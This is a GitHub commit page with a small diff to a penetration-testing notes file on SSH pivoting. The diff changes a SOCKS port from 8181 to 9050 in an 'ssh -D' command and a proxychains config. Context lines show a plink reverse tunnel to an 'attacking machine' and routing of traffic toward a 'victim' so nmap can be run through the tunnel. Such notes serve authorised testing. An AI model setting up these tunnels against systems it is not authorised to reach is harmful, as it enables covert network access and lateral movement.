Skip to content

Commit

Permalink
minor
Browse files Browse the repository at this point in the history
  • Loading branch information
maldevel committed Jun 6, 2017
1 parent dcf0362 commit a6bcb28
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions misc/ssh.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ plink -l root -pw <mypassword> <attacking.machine.ip.address> -R 3390:127.0.0.1:
* Forward/Tunnel and redirect our traffic to the victim's machine.

```bash
ssh -D 8181 [email protected]
ssh -D 9050 [email protected]
```

* proxychains
Expand All @@ -29,7 +29,7 @@ nano /etc/proxychains.conf
```bash
[ProxyList]
#...
socks4 127.0.0.1 8181
socks4 127.0.0.1 9050
```

* Run e.g. nmap
Expand Down

0 comments on commit a6bcb28

Please sign in to comment.